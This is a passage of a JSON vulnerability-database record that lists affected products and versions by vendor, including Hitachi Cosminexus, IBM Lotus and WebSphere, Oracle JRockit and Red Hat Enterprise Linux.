"trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional version 06-51-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "linux enterprise java sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2143" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.1" }, { "model": "cosminexus developer standard version 06-51-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server enterprise 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "aura conferencing sp1 standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cosminexus developer light version 06-51-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere transformation extender for integration servers", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.34" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "560010.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.2" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.41" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.170" }, { "model": "cosminexus primary server base 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.4" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "lotus notes fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.35" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.32" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.12" }, { "model": "ucosminexus developer professional 06-70-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "linux enterprise software development kit sp2", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.13" }, { "model": "cosminexus application server standard version 06-00-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "jdk 0 03", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "core", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9" }, { "model": "cosminexus application server enterprise version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-02" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "lotus symphony", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.3" }, { "model": "smartcloud orchestrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "jrockit r28.2.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus primary server base 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server version 05-05-/r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.029" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.31" }, { "model": "ucosminexus client 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.5" }, { "model": "ucosminexus developer standard 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "trio tview software", "scope": "ne", "trust": 0.3, "vendor": "schneider electric", "version": "3.29.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "ucosminexus application server standard (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "lotus notes fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.33" }, { "model": "ucosminexus developer standard 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus studio version 05-05-/o", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "cosminexus studio version 05-05-/r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "jrockit r27.7.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus studio version 05-00-/s", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.8" }, { "model": "ucosminexus application server light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.0" }, { "model": "lotus notes fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.32" }, { "model": "cosminexus client version 06-02-/g", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "freeflow print server 82.d2.24", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "freeflow print server 73.d4.31b", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.27" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.1" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.4" }, { "model": "websphere application server community edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.4" }, { "model": "ida pro", "scope": "eq", "trust": 0.3, "vendor": "hex ray", "version": "6.5" }, { "model": "cosminexus studio version 05-01-/l", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "ucosminexus application server standard 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus developer version 05-00-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-70" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "tivoli netcool/impact", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "lotus domino 8.5.1fp5", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "13.04" }, { "model": "suse core for", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "9x86" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.4" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "jrockit r27.1.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client version 06-50-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus expeditor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "web experience factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.18" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "jrockit r28.1.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.2" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56009.7" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.185" }, { "model": "jrockit r27.6.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "network and security manager software r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus client version 06-00-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "jrockit r27.6.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.2" }, { "model": "cosminexus primary server base 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "cosminexus developer professional version 06-51-/n", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.45" }, { "model": "ucosminexus developer light 06-70-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli endpoint manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.17" }, { "model": "cosminexus developer light version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus developer standard version 06-50-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.12" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1.1" }, { "model": "cosminexus application server enterprise version 06-02-/f", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "jre beta", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "cosminexus application server enterprise version 06-00-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere real time sr6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.1" }, { "model": "jrockit r28.2.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "jrockit r27.6.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus developer standard version 06-50-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "cosminexus primary server base 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer standard version 06-02-/d", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.31" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "i5/os v6r1m0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "cosminexus application server version 05-05-/o", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus application server enterprise version 06-50-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "jrockit r27.7.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "network and security manager software r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "tivoli business service manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.23" }, { "model": "network and security manager software r8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-70" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.33" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.32" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "jrockit r28.2.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.1" }, { "model": "cosminexus client version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-02" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.11" }, { "model": "cosminexus application server enterprise version 06-50-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "lotus symphony", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.01" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.4" }, { "model": "cosminexus developer light version 06-02-/f", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "tivoli netcool/impact", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "jdk 0 09", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.2" }, { "model": "jrockit r27.7.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus application server version 05-01-/l", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus primary server base 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli security policy manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "smartcloud orchestrator fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "cosminexus application server standard version 06-51-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.24" }, { "model": "websphere real time sr5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "cognos express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "lotus domino fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.34" }, { "model": "lotus expeditor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "cosminexus application server standard version 06-50-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer professional version 06-02-/d", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.10" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "cosminexus developer version 05-05-/r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "jdk 1.6.0 01-b06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "lotus notes fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.34" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "jdk 1.5.0.0 03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "cosminexus developer standard version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-02" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.7" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus application server standard version 06-02-/d", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "lotus domino fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.25" }, { "model": "os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x2013-005" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.17" }, { "model": "lotus domino fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "ucosminexus application server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "freeflow print server 81.d0.73", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "cosminexus developer version 05-00-/s", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "jrockit r28.2.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "content analytics with enterprise search", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "jrockit r27.6.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus developer professional version 06-02-/f", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "cosminexus developer standard version 06-50-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.4" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cosminexus application server standard version 06-50-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "linux enterprise java sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.13" }, { "model": "ucosminexus developer standard 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.5" }, { "model": "websphere operational decision management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "freeflow print server 90.d3.06", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "jrockit r28.2.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server smart edition (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "lotus domino 8.5fp1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.143" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.0" }, { "model": "jrockit r27.6.9", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", 